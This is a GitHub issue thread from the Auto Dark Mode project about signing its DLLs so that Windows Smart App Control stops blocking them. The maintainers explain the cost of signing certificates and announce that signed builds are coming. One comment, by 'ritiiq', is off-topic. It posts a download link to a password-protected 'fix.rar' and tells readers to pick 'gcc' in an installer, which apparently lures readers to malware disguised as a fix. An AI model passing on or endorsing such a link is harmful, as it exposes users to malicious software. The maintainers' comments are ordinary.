### ISSUE TITLE
Signing of DLLs

### ISSUE THREAD

**Issue by ThioJoe** [AutoDarkMode/Windows-Auto-Night-Mode#871]
I have Windows Smart App Control enabled, and every once in a while it gets overzealous (until the reputation definitions get updated I guess), and ends up blocking more unsigned binaries than usual.

I was hoping you'd be able to start signing the DLLs in addition to the exes which would fix that.  Not all the third party DLLs and stuff, just the specific Auto Dark Mode ones.

A couple examples:
<img width="239" alt="image" src="https://github.com/user-attachments/assets/3a96766d-50e9-4d84-9a9b-57b76ec7eb95">

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Spiritreader** [comment]
I have added the two main dlls to the signing script!

**Comment by Spiritreader** [comment]
It seems like Azure Code Signing (which we beta testers of) has been shut down and Microsoft has since monetized said service. We have to investigate if we can afford signing at all at the moment.

**Comment by Spiritreader** [comment]
We are currently in talks with MS to get into their free signing program for Open Source software developers.
However, this might take a while to clear.

Until then we cannot push any more signed beta builds, so I would recommend to disable automatic updates for now if you want to stay on the latest beta version and rely on signed executables.

**Comment by Spiritreader** [comment]
We have acquired the necessary signing certificates, the latest beta builds and the upcoming release will have the dlls signed in addition to the executable entrypoints.
